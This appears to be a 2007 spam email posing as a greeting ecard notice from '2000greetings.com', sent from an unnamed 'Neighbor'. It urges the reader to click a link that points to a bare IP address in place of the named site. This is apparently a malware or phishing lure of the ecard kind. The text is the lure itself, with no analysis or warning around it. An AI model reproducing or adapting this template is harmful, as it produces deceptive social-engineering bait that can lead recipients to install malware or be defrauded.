Subject: Neighbor sent you a greeting ecard from 2000greetings.com!

From: "2000greetings.com" <[email-masked]>
Date: Fri, 10 Aug 2007 09:29:07 -0700

Neighbor has created a greeting ecard for you at 2000greetings.com,
the Internet's most popular greeting card service. 

Your greeting card ID is: 8a7c0b58e47d14c775ed2175ee0c2a4c1c8a8a 

To see your custom greeting card, simply click on the link below: 
http://24.23.72.72/?8a7c0b58e47d14c775ed2175ee0c2a4c1c8a8a

Send greeting cards from 2000greetings.com whenever you want by visiting us at: 
http://2000greetings.com/
Copyright (c) 1996-2007 2000greetings.com All Rights Reserved